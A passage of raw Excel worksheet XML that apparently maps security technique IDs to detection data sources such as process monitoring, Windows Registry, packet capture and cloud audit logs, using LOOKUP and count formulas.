    <row r="556" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A556" s="55" t="s">
        <v>2527</v>
      </c>
      <c r="B556" s="53" t="str">
        <f>LOOKUP(A556,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C556" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D556" s="53">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="E556" s="53">
        <f t="shared" si="18"/>
        <v>2</v>
      </c>
    </row>
    <row r="557" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A557" s="53" t="s">
        <v>2531</v>
      </c>
      <c r="B557" s="53" t="str">
        <f>LOOKUP(A557,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring</v>
      </c>
      <c r="D557" s="53">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="E557" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="558" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A558" s="53" t="s">
        <v>2535</v>
      </c>
      <c r="B558" s="53" t="str">
        <f>LOOKUP(A558,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring,Environment variable</v>
      </c>
      <c r="D558" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E558" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="559" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A559" s="55" t="s">
        <v>2540</v>
      </c>
      <c r="B559" s="53" t="str">
        <f>LOOKUP(A559,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C559" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D559" s="53">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="E559" s="53">
        <f t="shared" si="18"/>
        <v>2</v>
      </c>
    </row>
    <row r="560" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A560" s="55" t="s">
        <v>2544</v>
      </c>
      <c r="B560" s="53" t="str">
        <f>LOOKUP(A560,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C560" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D560" s="53">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="E560" s="53">
        <f t="shared" si="18"/>
        <v>2</v>
      </c>
    </row>
    <row r="561" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A561" s="55" t="s">
        <v>2548</v>
      </c>
      <c r="B561" s="53" t="str">
        <f>LOOKUP(A561,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,File monitoring</v>
      </c>
      <c r="C561" s="56" t="s">
        <v>126</v>
      </c>
      <c r="D561" s="53">
        <f t="shared" si="17"/>
        <v>2</v>
      </c>
      <c r="E561" s="53">
        <f t="shared" si="18"/>
        <v>2</v>
      </c>
    </row>
    <row r="562" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A562" s="53" t="s">
        <v>2551</v>
      </c>
      <c r="B562" s="53" t="str">
        <f>LOOKUP(A562,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Services,File monitoring</v>
      </c>
      <c r="D562" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E562" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="563" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A563" s="53" t="s">
        <v>2556</v>
      </c>
      <c r="B563" s="53" t="str">
        <f>LOOKUP(A563,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Process command-line parameters</v>
      </c>
      <c r="D563" s="53">
        <f t="shared" si="17"/>
        <v>3</v>
      </c>
      <c r="E563" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="564" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A564" s="53" t="s">
        <v>2561</v>
      </c>
      <c r="B564" s="53" t="str">
        <f>LOOKUP(A564,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="D564" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E564" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="565" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A565" s="53" t="s">
        <v>2566</v>
      </c>
      <c r="B565" s="53" t="str">
        <f>LOOKUP(A565,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D565" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E565" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="566" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A566" s="53" t="s">
        <v>2570</v>
      </c>
      <c r="B566" s="53" t="str">
        <f>LOOKUP(A566,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D566" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E566" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="567" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A567" s="53" t="s">
        <v>2575</v>
      </c>
      <c r="B567" s="53" t="str">
        <f>LOOKUP(A567,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D567" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E567" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="568" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A568" s="53" t="s">
        <v>2579</v>
      </c>
      <c r="B568" s="53" t="str">
        <f>LOOKUP(A568,'REF-DataSources'!A:C)</f>
        <v>GCP audit logs,Stackdriver logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D568" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E568" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
    <row r="569" spans="1:5" x14ac:dyDescent="0.2">
      <c r="A569" s="53" t="s">
        <v>2583</v>
      </c>
      <c r="B569" s="53" t="str">
        <f>LOOKUP(A569,'REF-DataSources'!A:C)</f>
        <v>Stackdriver logs,GCP audit logs,Azure activity logs,AWS CloudTrail logs</v>
      </c>
      <c r="D569" s="53">
        <f t="shared" si="17"/>
        <v>4</v>
      </c>
      <c r="E569" s="53">
        <f t="shared" si="18"/>
        <v>1</v>
      </c>
    </row>
  </sheetData>
  <phoneticPr fontId="0" type="noConversion"/>
  <conditionalFormatting sqref="G2">
    <cfRule type="iconSet" priority="1">
      <iconSet iconSet="3Symbols2" reverse="1">
        <cfvo type="percent" val="0"/>
        <cfvo type="num" val="0" gte="0"/>
        <cfvo type="num" val="0" gte="0"/>
      </iconSet>
    </cfRule>
  </conditionalFormatting>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>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79ED3-26CD-DA4B-8E4F-144D2459E3ED}">
  <dimension ref="A1:V267"/>
  <sheetViews>
    <sheetView zoomScale="140" zoomScaleNormal="140" workbookViewId="0">
      <selection activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="8.83203125" defaultRowHeight="15" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="16.1640625" style="4" customWidth="1"/>
    <col min="2" max="2" width="124.83203125" style="4" customWidth="1"/>
    <col min="3" max="3" width="21" style="5" customWidth="1"/>
    <col min="4" max="4" width="15.6640625" style="4" customWidth="1"/>
    <col min="5" max="6" width="11.1640625" style="4" customWidth="1"/>
    <col min="7" max="7" width="47.6640625" style="12" customWidth="1"/>
    <col min="8" max="22" width="9.1640625" style="3" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" ht="33" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A1" s="28" t="s">
        <v>37</v>
      </c>
      <c r="B1" s="28" t="s">
        <v>38</v>
      </c>
      <c r="C1" s="28" t="s">
        <v>39</v>
      </c>
      <c r="D1" s="28" t="s">
        <v>40</v>
      </c>
      <c r="E1" s="28" t="s">
        <v>41</v>
      </c>
      <c r="F1" s="28" t="s">
        <v>42</v>
      </c>
      <c r="G1" s="28" t="s">
        <v>43</v>
      </c>
    </row>
    <row r="2" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A2" s="16" t="s">
        <v>44</v>
      </c>
      <c r="B2" s="53" t="str">
        <f>LOOKUP(A2,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C2" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D2" s="53">
        <f>LEN(TRIM(B2))-LEN(SUBSTITUTE(TRIM(B2),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E2" s="53">
        <f t="shared" ref="E2:E8" si="0">LEN(TRIM(C2))-LEN(SUBSTITUTE(TRIM(C2),";",""))+1</f>
        <v>4</v>
      </c>
      <c r="F2" s="18"/>
      <c r="G2" s="53">
        <f>SUM(COUNTA('REF-DataSources'!A:A)-COUNTA(A:A))</f>
        <v>302</v>
      </c>
    </row>
    <row r="3" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A3" s="16" t="s">
        <v>46</v>
      </c>
      <c r="B3" s="53" t="str">
        <f>LOOKUP(A3,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Process monitoring,Network protocol analysis</v>
      </c>
      <c r="C3" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D3" s="53">
        <f t="shared" ref="D3:D66" si="1">LEN(TRIM(B3))-LEN(SUBSTITUTE(TRIM(B3),",",""))+1</f>
        <v>4</v>
      </c>
      <c r="E3" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F3" s="18"/>
      <c r="G3" s="19"/>
    </row>
    <row r="4" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A4" s="16" t="s">
        <v>48</v>
      </c>
      <c r="B4" s="53" t="str">
        <f>LOOKUP(A4,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</v>
      </c>
      <c r="C4" s="17" t="s">
        <v>47</v>
      </c>
      <c r="D4" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E4" s="53">
        <f t="shared" si="0"/>
        <v>4</v>
      </c>
      <c r="F4" s="18"/>
      <c r="G4" s="19"/>
    </row>
    <row r="5" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A5" s="16" t="s">
        <v>49</v>
      </c>
      <c r="B5" s="53" t="str">
        <f>LOOKUP(A5,'REF-DataSources'!A:C)</f>
        <v/>
      </c>
      <c r="C5" s="17" t="s">
        <v>50</v>
      </c>
      <c r="D5" s="53">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E5" s="53">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F5" s="18"/>
      <c r="G5" s="19"/>
    </row>
    <row r="6" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A6" s="16" t="s">
        <v>51</v>
      </c>
      <c r="B6" s="53" t="str">
        <f>LOOKUP(A6,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C6" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D6" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E6" s="53">
        <f t="shared" si="0"/>
        <v>3</v>
      </c>
      <c r="F6" s="18"/>
      <c r="G6" s="19"/>
    </row>
    <row r="7" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A7" s="16" t="s">
        <v>53</v>
      </c>
      <c r="B7" s="53" t="str">
        <f>LOOKUP(A7,'REF-DataSources'!A:C)</f>
        <v>API monitoring</v>
      </c>
      <c r="C7" s="17">
        <v>100</v>
      </c>
      <c r="D7" s="53">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="E7" s="53">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="F7" s="53"/>
      <c r="G7" s="19"/>
    </row>
    <row r="8" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A8" s="16" t="s">
        <v>54</v>
      </c>
      <c r="B8" s="53" t="str">
        <f>LOOKUP(A8,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C8" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D8" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E8" s="53">
        <f t="shared" si="0"/>
        <v>2</v>
      </c>
      <c r="F8" s="53"/>
      <c r="G8" s="19"/>
    </row>
    <row r="9" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A9" s="16" t="s">
        <v>56</v>
      </c>
      <c r="B9" s="53" t="str">
        <f>LOOKUP(A9,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
      <c r="C9" s="17" t="s">
        <v>57</v>
      </c>
      <c r="D9" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E9" s="53">
        <f>LEN(TRIM(C9))-LEN(SUBSTITUTE(TRIM(C9),";",""))+1</f>
        <v>5</v>
      </c>
      <c r="F9" s="53"/>
      <c r="G9" s="19"/>
    </row>
    <row r="10" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A10" s="16" t="s">
        <v>58</v>
      </c>
      <c r="B10" s="53" t="str">
        <f>LOOKUP(A10,'REF-DataSources'!A:C)</f>
        <v>Malware reverse engineering,Netflow/Enclave netflow,Packet capture,Process monitoring,Process use of network</v>
      </c>
      <c r="C10" s="17" t="s">
        <v>59</v>
      </c>
      <c r="D10" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E10" s="53">
        <f t="shared" ref="E10:E73" si="2">LEN(TRIM(C10))-LEN(SUBSTITUTE(TRIM(C10),";",""))+1</f>
        <v>3</v>
      </c>
      <c r="F10" s="53"/>
      <c r="G10" s="19"/>
    </row>
    <row r="11" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A11" s="16" t="s">
        <v>60</v>
      </c>
      <c r="B11" s="53" t="str">
        <f>LOOKUP(A11,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C11" s="17" t="s">
        <v>61</v>
      </c>
      <c r="D11" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E11" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F11" s="53"/>
      <c r="G11" s="19"/>
    </row>
    <row r="12" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A12" s="16" t="s">
        <v>62</v>
      </c>
      <c r="B12" s="53" t="str">
        <f>LOOKUP(A12,'REF-DataSources'!A:C)</f>
        <v>User interface,Process monitoring</v>
      </c>
      <c r="C12" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D12" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E12" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F12" s="53"/>
      <c r="G12" s="19"/>
    </row>
    <row r="13" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A13" s="16" t="s">
        <v>64</v>
      </c>
      <c r="B13" s="53" t="str">
        <f>LOOKUP(A13,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C13" s="17" t="s">
        <v>65</v>
      </c>
      <c r="D13" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E13" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F13" s="53"/>
      <c r="G13" s="19"/>
    </row>
    <row r="14" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A14" s="16" t="s">
        <v>66</v>
      </c>
      <c r="B14" s="53" t="str">
        <f>LOOKUP(A14,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C14" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D14" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E14" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F14" s="53"/>
      <c r="G14" s="19"/>
    </row>
    <row r="15" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A15" s="16" t="s">
        <v>68</v>
      </c>
      <c r="B15" s="53" t="str">
        <f>LOOKUP(A15,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
      <c r="C15" s="17" t="s">
        <v>69</v>
      </c>
      <c r="D15" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E15" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F15" s="53"/>
      <c r="G15" s="19"/>
    </row>
    <row r="16" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A16" s="16" t="s">
        <v>70</v>
      </c>
      <c r="B16" s="53" t="str">
        <f>LOOKUP(A16,'REF-DataSources'!A:C)</f>
        <v>BIOS,MBR,System calls</v>
      </c>
      <c r="C16" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D16" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E16" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F16" s="53"/>
      <c r="G16" s="19"/>
    </row>
    <row r="17" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A17" s="16" t="s">
        <v>72</v>
      </c>
      <c r="B17" s="53" t="str">
        <f>LOOKUP(A17,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C17" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D17" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E17" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F17" s="53"/>
      <c r="G17" s="19"/>
    </row>
    <row r="18" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A18" s="16" t="s">
        <v>73</v>
      </c>
      <c r="B18" s="53" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C18" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D18" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E18" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F18" s="53"/>
      <c r="G18" s="19"/>
    </row>
    <row r="19" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A19" s="16" t="s">
        <v>75</v>
      </c>
      <c r="B19" s="53" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
      <c r="C19" s="17" t="s">
        <v>76</v>
      </c>
      <c r="D19" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E19" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F19" s="53"/>
      <c r="G19" s="19"/>
    </row>
    <row r="20" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A20" s="16" t="s">
        <v>77</v>
      </c>
      <c r="B20" s="53" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
      <c r="C20" s="17" t="s">
        <v>78</v>
      </c>
      <c r="D20" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E20" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F20" s="53"/>
      <c r="G20" s="19"/>
    </row>
    <row r="21" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A21" s="16" t="s">
        <v>79</v>
      </c>
      <c r="B21" s="53" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process use of network</v>
      </c>
      <c r="C21" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D21" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E21" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F21" s="53"/>
      <c r="G21" s="19"/>
    </row>
    <row r="22" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A22" s="16" t="s">
        <v>80</v>
      </c>
      <c r="B22" s="53" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,Process use of network,Process monitoring,Process command-line parameters,PowerShell logs,Packet capture,Network protocol analysis,Netflow/Enclave netflow,File monitoring,DLL monitoring,Authentication logs,API monitoring</v>
      </c>
      <c r="C22" s="17">
        <v>100</v>
      </c>
      <c r="D22" s="53">
        <f t="shared" si="1"/>
        <v>13</v>
      </c>
      <c r="E22" s="53">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="F22" s="53"/>
      <c r="G22" s="19"/>
    </row>
    <row r="23" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A23" s="16" t="s">
        <v>81</v>
      </c>
      <c r="B23" s="53" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
      <c r="C23" s="17" t="s">
        <v>82</v>
      </c>
      <c r="D23" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E23" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F23" s="53"/>
      <c r="G23" s="19"/>
    </row>
    <row r="24" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A24" s="16" t="s">
        <v>83</v>
      </c>
      <c r="B24" s="53" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
      <c r="C24" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D24" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E24" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F24" s="53"/>
      <c r="G24" s="19"/>
    </row>
    <row r="25" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A25" s="16" t="s">
        <v>84</v>
      </c>
      <c r="B25" s="53" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
      <c r="C25" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D25" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E25" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F25" s="53"/>
      <c r="G25" s="19"/>
    </row>
    <row r="26" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A26" s="16" t="s">
        <v>85</v>
      </c>
      <c r="B26" s="53" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C26" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D26" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E26" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F26" s="53"/>
      <c r="G26" s="19"/>
    </row>
    <row r="27" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A27" s="16" t="s">
        <v>86</v>
      </c>
      <c r="B27" s="53" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
      <c r="C27" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D27" s="53">
        <f t="shared" si="1"/>
        <v>5</v>
      </c>
      <c r="E27" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F27" s="53"/>
      <c r="G27" s="19"/>
    </row>
    <row r="28" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A28" s="16" t="s">
        <v>87</v>
      </c>
      <c r="B28" s="53" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</v>
      </c>
      <c r="C28" s="17" t="s">
        <v>88</v>
      </c>
      <c r="D28" s="53">
        <f t="shared" si="1"/>
        <v>12</v>
      </c>
      <c r="E28" s="53">
        <f t="shared" si="2"/>
        <v>12</v>
      </c>
      <c r="F28" s="53"/>
      <c r="G28" s="19"/>
    </row>
    <row r="29" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A29" s="16" t="s">
        <v>89</v>
      </c>
      <c r="B29" s="53" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</v>
      </c>
      <c r="C29" s="17" t="s">
        <v>90</v>
      </c>
      <c r="D29" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E29" s="53">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="F29" s="53"/>
      <c r="G29" s="19"/>
    </row>
    <row r="30" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A30" s="16" t="s">
        <v>91</v>
      </c>
      <c r="B30" s="53" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C30" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D30" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E30" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F30" s="53"/>
      <c r="G30" s="19"/>
    </row>
    <row r="31" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A31" s="16" t="s">
        <v>92</v>
      </c>
      <c r="B31" s="53" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C31" s="17" t="s">
        <v>93</v>
      </c>
      <c r="D31" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E31" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F31" s="53"/>
      <c r="G31" s="19"/>
    </row>
    <row r="32" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A32" s="16" t="s">
        <v>94</v>
      </c>
      <c r="B32" s="53" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C32" s="17" t="s">
        <v>95</v>
      </c>
      <c r="D32" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E32" s="53">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="F32" s="53"/>
      <c r="G32" s="19"/>
    </row>
    <row r="33" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A33" s="16" t="s">
        <v>96</v>
      </c>
      <c r="B33" s="53" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
      <c r="C33" s="17" t="s">
        <v>97</v>
      </c>
      <c r="D33" s="53">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="E33" s="53">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="F33" s="53"/>
      <c r="G33" s="19"/>
    </row>
    <row r="34" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A34" s="16" t="s">
        <v>98</v>
      </c>
      <c r="B34" s="53" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C34" s="17" t="s">
        <v>99</v>
      </c>
      <c r="D34" s="53">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="E34" s="53">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="F34" s="53"/>
      <c r="G34" s="19"/>
    </row>
    <row r="35" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A35" s="16" t="s">
        <v>100</v>
      </c>
      <c r="B35" s="53" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
      <c r="C35" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D35" s="53">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="E35" s="53">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="F35" s="53"/>
      <c r="G35" s="19"/>
    </row>
    <row r="36" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A36" s="16" t="s">
        <v>101</v>
      </c>
      <c r="B36" s="53" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:C)</f>
